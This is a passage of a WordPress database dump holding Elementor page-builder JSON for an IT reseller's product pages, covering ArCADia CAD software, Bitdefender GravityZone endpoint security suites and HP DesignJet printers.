Software<\\/h4>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"dd6f521\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"8ce7166\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":33.33},\"elements\":[{\"id\":\"7597f91\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\">ArCADia-3D VIEWER<\\/h3>\\n\\n<hr \\/>\\n\\n&nbsp;\\n<img src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/10\\/3dviewer-1.jpg\\\" alt=\\\"\\\" \\/>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f73a3d0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":35},\"elements\":[{\"id\":\"8743085\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\">ArCADia-TEXT<\\/h3><hr \\/><p>\\u00a0<br \\/><img src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/10\\/text-2.jpg\\\" alt=\\\"\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"25ed98b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":31.334},\"elements\":[{\"id\":\"958b19c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\">Licence Manager<\\/h3>\\n\\n<hr \\/>\\n\\n&nbsp;\\n<center><img src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/10\\/menadzer-lic-1.jpg\\\" alt=\\\"\\\" \\/><\\/center>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7a7fbdd\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"3b87784\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"dbae713\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6629b54\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"ef1cf3c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ee9c18c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>To discover more, please click the button below or contact us to discuss your needs.<\\/p><center>[maxbutton id=\\\"1\\\" ]<\\/center>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(8316,3619,'_elementor_template_type','post'),(8317,3619,'_elementor_data','[{\"id\":\"f45ae99\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"8e3ad8e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2d4b58a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>Protect Your Endpoints with Layered Next-Gen Security, now with EDR<\\/h2><h3>It\\u2019s Time to Rethink Endpoint Security<br \\/>Protect Endpoints<\\/h3><p>Organizations around the globe are facing an era of increasingly sophisticated attacks with never before seen global outbreaks of cyber threats. With increasing complexity and mobility of endpoints but limited resources and security staff shortage, companies are falling behind. As a consequence over half of breaches start with a compromised endpoint. It\\u2019s time to rethink endpoint security! <br \\/>Bitdefender developed GravityZone to be an effective defense for enterprise digital assets against the entire range of cyberthreats, from common ones to the most sophisticated cyberthreats. The industry leading prevention that relies on the accurate machine learning technologies and behavior analytics coupled with response automation and the new easy-to-use EDR, delivers un-paralleled protection and threat visibility while keeping the resources and capabilities requirements low.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4d48298\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"92610b0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"511bcd1\",\"elType\":\"widget\",\"settings\":{\"title\":\"Product\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1968e47\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"5621671\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d2b3de2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3><strong>GravityZone Elite Suite\\u00a0<\\/strong><\\/h3><p>Layered next-gen architecture that delivers prevention, detection, remediation and visibility in a single modular platform.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2d90c4a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8c385b6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3><strong>GravityZone Ultra Suite\\u00a0<\\/strong><\\/h3><p>GravityZone Ultra integrates layered next-gen endpoint protection and easy-to-use EDR platform to accurately protect enterprises against even the most elusive cyber threats.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0df7a2e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9e3ad11\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3><strong>GravityZone Enterprise Security<\\/strong><\\/h3><p>Bitdefender\\u2019s Enterprise Security delivers layered next-gen security that consistently ranks first in independent tests. It leverages a single management platform to reduce the cost of building a trusted environment for all endpoints.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8d71c81\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"8156e62\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9a9e1d2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 class=\\\"title\\\">Protect all devices<\\/h2><h3>Anti Ransomware<\\/h3><p>Ransomware has quickly become one of the most infectious and feared threats in business environments. Ironically, the main cost is not the ransom itself, but the business downtime it causes \\u2013 so it is not surprising that only a third of businesses believe they will recover from a ransomware attack without significant losses.<\\/p><h3 id=\\\"products\\\" class=\\\"title-products\\\">Products<\\/h3><p>All Bitdefender endpoint solutions protect your enterprise endpoints against ransomware.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"252c7e8\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"8230f0c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b52c9d3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3><strong>GravityZone Elite Suite\\u00a0<\\/strong><\\/h3><p>Layered next-gen architecture that delivers prevention, detection, remediation and visibility in a single modular platform.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6d7174f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cb8152b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3><strong>GravityZone Security for Endpoints <\\/strong><\\/h3><p>Solution designed to protect on-premise deployments, delivering prevention, detection, remediation and visibility in a single modular platform.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0a1147c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a2e7e9b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3><strong>GravityZone Advanced Business Security <\\/strong><\\/h3><p>Bundle of security features and solutions delivering layered protection, including: machine learning anti-malware, behavioral analysis, anti-ransomware, advanced anti-exploit, continuous monitoring of running processes and many more.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0c510a4\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"8f6037c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ebef62d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"To discover more, please click the button below or contact us to discuss your needs.\\n\\n&nbsp;\\n<center>[maxbutton id=\\\"1\\\" ]<\\/center>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(8318,3619,'_elementor_version','2.5.14'),(8636,3656,'_wp_desired_post_slug',''),(8637,3660,'_elementor_edit_mode','builder'),(8632,3659,'_elementor_template_type','wp-page'),(8633,3659,'_elementor_version','2.7.4'),(8634,3656,'_wp_trash_meta_status','draft'),(8635,3656,'_wp_trash_meta_time','1571989013'),(8328,1526,'swift-performance','a:0:{}'),(8329,1528,'swift-performance','a:0:{}'),(8330,1528,'_elementor_edit_mode','builder'),(8331,1528,'_elementor_template_type','post'),(8332,1528,'_elementor_version','2.5.14'),(8343,3626,'_elementor_data','[{\"id\":\"053623e\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#ffffff\",\"border_border\":\"solid\",\"border_color\":\"#e9e9e9\",\"border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true}},\"elements\":[{\"id\":\"3436418\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":60,\"space_between_widgets\":0,\"margin\":{\"unit\":\"px\",\"top\":\"32\",\"right\":\"32\",\"bottom\":\"32\",\"left\":\"32\",\"isLinked\":true}},\"elements\":[{\"id\":\"42cc427\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 class=\\\"font-lh3 \\\">HP DesignJet large-format office printers<\\/h2><p>These printers are ideal for individual or multiuser environments, delivering high-quality applications, from black and white CAD drawings to color presentations, while tools like automatic media-roll alignment and accurate print previews help streamline workflows and ensure efficiency.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"4aa4bcf\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":39.928},\"elements\":[{\"id\":\"3831de6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"wp-image-2502 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/HP-DesignJet-T120-Printer.jpg\\\" alt=\\\"\\\" width=\\\"242\\\" height=\\\"185\\\" \\/><\\/p><h3 style=\\\"text-align: center;\\\"><strong>HP DesignJet T120 Printer<\\/strong><\\/h3>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c500bf0\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#ffffff\",\"border_border\":\"solid\",\"border_color\":\"#e9e9e9\",\"border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":0,\"bottom\":\"10\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"1fe0754\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":39.928,\"space_between_widgets\":0,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"dba6320\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div><div><img class=\\\"wp-image-2503 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/HP-DesignJet-T1700-Printer-series.jpg\\\" alt=\\\"\\\" width=\\\"196\\\" height=\\\"196\\\" \\/><\\/div><\\/div><div><h3 style=\\\"text-align: center;\\\"><strong>HP DesignJet T1700 Printer series<\\/strong><\\/h3><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"fb27127\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":60,\"margin\":{\"unit\":\"px\",\"top\":\"39\",\"right\":\"39\",\"bottom\":\"39\",\"left\":\"39\",\"isLinked\":true}},\"elements\":[{\"id\":\"4f8ff0d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 class=\\\"font-lh3 \\\">The most affordable and compact HP DesignJet printer<\\/h2><div class=\\\"description\\\">The HP DesignJet T120 Printer fits your budget and your space. Install this compact printer where it\'s most convenient, and enjoy wireless connectivity and easy-to-use features.<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6ca232d9\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"59b10f23\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"42c95afc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div>\\u00a0<\\/div><div><h3 class=\\\"font-lh3 \\\">Secure, empowering printer for CAD\\/GIS workgroups<\\/h3><div class=\\\"description\\\">Confidently take CAD, GIS color reproduction to the next level with a 44-in HP DesignJet printer that delivers powerful security features, high productivity on even the most complex files, and bright and precise colors. Dynamic security: Cartridges with non-HP chips might not work today or in the future.<\\/div><div>\\u00a0<\\/div><div><ul><li class=\\\"small-caption\\\"><strong>HP DesignJet T830 Multifunction Printer series<\\/strong><\\/li><\\/ul><p><img class=\\\"alignnone wp-image-2504\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/HP-DesignJet-T830-Multifunction-Printer-series.jpg\\\" alt=\\\"\\\" width=\\\"272\\\" height=\\\"181\\\" \\/><\\/p><h3 class=\\\"font-lh3 \\\">Smart choice for evolving architect\\/construction offices<\\/h3><div class=\\\"description\\\">Immediately update all your partners on project review results with the most compact large-format MFP. Intuitive, convenient print\\/scan\\/copy and HP DesignJet print quality help you communicate effectively and move the project forward. Dynamic security: Cartridges with non-HP chips might not work today or in the future.<\\/div><div>\\u00a0<\\/div><\\/div><\\/div><div><h3>\\u00a0<\\/h3><h3 class=\\\"font-lh3 \\\">HP DesignJet large-format production printers<\\/h3><div class=\\\"description\\\">Turn jobs around in record time with market-leading technology that delivers fast print speeds. Produce AEC, CAD drawings, and high-quality photos, POP\\/POS, posters, canvas, backlits, banners, and event graphics.<\\/div><\\/div><div><div>\\u00a0<\\/div><ul><li class=\\\"small-caption\\\"><strong>HP DesignJet T3500 Production Multifunction Printe<\\/strong>r<\\/li><\\/ul><p><img class=\\\"alignnone wp-image-2505\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/HP-DesignJet-T3500-Production-Multifunction-Printer.jpg\\\" alt=\\\"\\\" width=\\\"199\\\" height=\\\"199\\\" \\/><\\/p><h3 class=\\\"font-lh3 \\\">Productivity in full color<\\/h3><div class=\\\"description\\\">As the most productive, cost-effective HP DesignJet MFP, HP DesignJet T3500 is built for rigorous IT demands. Meet all your black-and-white and color needs, while enjoying low cost of operation, advanced copy\\/scan features, and unattended operation.<\\/div><div>\\u00a0<\\/div><div><ul><li class=\\\"small-caption\\\"><strong>HP DesignJet Z6610 Production Printer<\\/strong><\\/li><\\/ul><p><img class=\\\"alignnone wp-image-2506\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/HP-DesignJet-Z6610-Production-Printer.jpg\\\" alt=\\\"\\\" width=\\\"240\\\" height=\\\"184\\\" \\/><\\/p><h3 class=\\\"font-lh3 \\\">The fastest graphics production printing solution<\\/h3><\\/div><\\/div><div>\\u00a0<\\/div><div><div><div>Produce sharp, durable prints with the fastest graphics production printing solution, designed to handle production peaks, and that seamlessly integrates into your current workflow.<\\/div><div>\\u00a0<\\/div><div><ul><li class=\\\"small-caption\\\"><strong>HP DesignJet Z6810 Production Printer series<\\/strong><\\/li><\\/ul><p><img class=\\\"alignnone wp-image-2507\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/HP-DesignJet-Z6810-Production-Printer-series.jpg\\\" alt=\\\"\\\" width=\\\"312\\\" height=\\\"166\\\" \\/><\\/p><h3 class=\\\"font-lh3 \\\">Meet customer high-quality expectations with the fastest production printing solution<\\/h3><p>Consistent, accurate color across prints and printers with embedded spectrophotometer. Easily create content and submit jobs using HP Applications Center.<\\/p><\\/div><\\/div><div>\\u00a0<\\/div><div><div>To discover more, please click the buttons below or contact us to discuss your needs.<\\/div><\\/div><\\/div><div>\\u00a0<\\/div><div>\\u00a0<\\/div><div>\\u00a0<\\/div><div><div>\\u00a0<\\/div><div>[maxbutton id=\\\"1\\\" ]<\\/div><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(8342,3626,'_elementor_version','2.5.14'),(8341,3626,'_elementor_template_type','post'),(8338,1528,'_elementor_data','[{\"id\":\"053623e\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#ffffff\",\"border_border\":\"solid\",\"border_color\":\"#e9e9e9\",\"border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true}},\"elements\":[{\"id\":\"3436418\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":60,\"space_between_widgets\":0,\"margin\":{\"unit\":\"px\",\"top\":\"32\",\"right\":\"32\",\"bottom\":\"32\",\"left\":\"32\",\"isLinked\":true}},\"elements\":[{\"id\":\"42cc427\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 class=\\\"font-lh3 \\\">HP DesignJet large-format office printers<\\/h2><p>These printers are ideal for individual or multiuser environments, delivering high-quality applications, from black and white CAD drawings to color presentations, while tools like automatic media-roll alignment and accurate print previews help streamline workflows and ensure efficiency.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"4aa4bcf\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":39.928},\"elements\":[{\"id\":\"3831de6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"wp-image-2502 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/HP-DesignJet-T120-Printer.jpg\\\" alt=\\\"\\\" width=\\\"242\\\" height=\\\"185\\\" \\/><\\/p><h3 style=\\\"text-align: center;\\\"><strong>HP DesignJet T120 Printer<\\/strong><\\/h3>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c500bf0\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#ffffff\",\"border_border\":\"solid\",\"border_color\":\"#e9e9e9\",\"border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":0,\"bottom\":\"10\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"1fe0754\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":39.928,\"space_between_widgets\":0,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"dba6320\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div><div><img class=\\\"wp-image-2503 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/HP-DesignJet-T1700-Printer-series.jpg\\\" alt=\\\"\\\" width=\\\"196\\\" height=\\\"196\\\" \\/><\\/div><\\/div><div><h3 style=\\\"text-align: center;\\\"><strong>HP DesignJet T1700 Printer series<\\/strong><\\/h3><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"fb27127\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":60,\"margin\":{\"unit\":\"px\",\"top\":\"39\",\"right\":\"39\",\"bottom\":\"39\",\"left\":\"39\",\"isLinked\":true}},\"elements\":[{\"id\":\"4f8ff0d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 class=\\\"font-lh3 \\\">The most affordable and compact HP DesignJet printer<\\/h2><div class=\\\"description\\\">The HP DesignJet T120 Printer fits your budget and your space. Install this compact printer where it\'s most convenient, and enjoy wireless connectivity and easy-to-use features.<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f91e907\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#ffffff\",\"border_border\":\"solid\",\"border_color\":\"#e9e9e9\",\"border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true}},\"elements\":[{\"id\":\"c20d5da\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":60,\"space_between_widgets\":0,\"margin\":{\"unit\":\"px\",\"top\":\"32\",\"right\":\"32\",\"bottom\":\"32\",\"left\":\"32\",\"isLinked\":true}},\"elements\":[{\"id\":\"ae5e9f2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 class=\\\"font-lh3 \\\">Secure, empowering printer for CAD\\/GIS workgroups<\\/h2><div class=\\\"description\\\">Confidently take CAD, GIS color reproduction to the next level with a 44-in HP DesignJet printer that delivers powerful security features, high productivity on even the most complex files, and bright and precise colors. Dynamic security: Cartridges with non-HP chips might not work today or in the future.<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"280b7a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":39.928},\"elements\":[{\"id\":\"91df282\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"wp-image-2504 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/HP-DesignJet-T830-Multifunction-Printer-series.jpg\\\" alt=\\\"\\\" width=\\\"272\\\" height=\\\"181\\\" \\/><\\/p><h3 style=\\\"text-align: center;\\\"><strong>HP DesignJet T830 Multifunction Printer series<\\/strong><\\/h3>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e456065\",\"elType\":\"section\",\"settings\":{\"border_border\":\"solid\",\"border_color\":\"#e9e9e9\",\"border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":0,\"bottom\":\"10\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"42de96a\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"margin\":{\"unit\":\"px\",\"top\":\"27\",\"right\":\"27\",\"bottom\":\"27\",\"left\":\"27\",\"isLinked\":true}},\"elements\":[{\"id\":\"7936e9b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 class=\\\"font-lh3 \\\" style=\\\"text-align: center;\\\">Smart choice for evolving architect\\/construction offices<\\/h2><div class=\\\"description\\\" style=\\\"text-align: center;\\\">Immediately update all your partners on project review results with the most compact large-format MFP. Intuitive, convenient print\\/scan\\/copy and HP DesignJet print quality help you communicate effectively and move the project forward. Dynamic security: Cartridges with non-HP chips might not work today or in the future.<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"83280e0\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#ffffff\",\"border_border\":\"solid\",\"border_color\":\"#e9e9e9\",\"border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":0,\"bottom\":\"10\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"a59e4fb\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":39.928,\"space_between_widgets\":0,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"53dfb2e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3><img class=\\\"alignnone wp-image-2505 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/HP-DesignJet-T3500-Production-Multifunction-Printer.jpg\\\" alt=\\\"\\\" width=\\\"199\\\" height=\\\"199\\\" \\/><\\/h3><h3 style=\\\"text-align: center;\\\"><strong>HP DesignJet T3500 Production Multifunction Printe<\\/strong>r<\\/h3>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"4d9ae37\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":60,\"margin\":{\"unit\":\"px\",\"top\":\"28\",\"right\":\"28\",\"bottom\":\"28\",\"left\":\"28\",\"isLinked\":true}},\"elements\":[{\"id\":\"711f6cd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>HP DesignJet large-format production printers<\\/h2><p>Turn jobs around in record time with market-leading technology that delivers fast print speeds. Produce AEC, CAD drawings, and high-quality photos, POP\\/POS, posters, canvas, backlits, banners, and event graphics.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7893108\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#ffffff\",\"border_border\":\"solid\",\"border_color\":\"#e9e9e9\",\"border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true}},\"elements\":[{\"id\":\"8eb8617\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":60,\"space_between_widgets\":0,\"margin\":{\"unit\":\"px\",\"top\":\"48\",\"right\":\"48\",\"bottom\":\"48\",\"left\":\"48\",\"isLinked\":true}},\"elements\":[{\"id\":\"1c947dd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 class=\\\"font-lh3 \\\">Productivity in full color<\\/h2><div class=\\\"description\\\">As the most productive, cost-effective HP DesignJet MFP, HP DesignJet T3500 is built for rigorous IT demands. Meet all your black-and-white and color needs, while enjoying low cost of operation, advanced copy\\/scan features, and unattended operation.<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b968bc5\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":39.928},\"elements\":[{\"id\":\"cdb38ed\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div><img class=\\\"alignnone wp-image-2506 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/HP-DesignJet-Z6610-Production-Printer.jpg\\\" alt=\\\"\\\" width=\\\"240\\\" height=\\\"184\\\" \\/><\\/div><h3 style=\\\"text-align: center;\\\"><strong>HP DesignJet Z6610 Production Printer<\\/strong><\\/h3>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1d87415\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#ffffff\",\"border_border\":\"solid\",\"border_color\":\"#e9e9e9\",\"border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":0,\"bottom\":\"10\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"97ed559\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":39.928,\"space_between_widgets\":0,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"f86294e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"alignnone wp-image-2507 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/HP-DesignJet-Z6810-Production-Printer-series.jpg\\\" alt=\\\"\\\" width=\\\"312\\\" height=\\\"166\\\" \\/><\\/p><h3 style=\\\"text-align: center;\\\"><strong>HP DesignJet Z6810 Production Printer series<\\/strong><\\/h3>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1b8cb4e\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":60,\"margin\":{\"unit\":\"px\",\"top\":\"38\",\"right\":\"38\",\"bottom\":\"38\",\"left\":\"38\",\"isLinked\":true}},\"elements\":[{\"id\":\"4375ff4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div><div><h2 class=\\\"font-lh3 \\\">The fastest graphics production printing 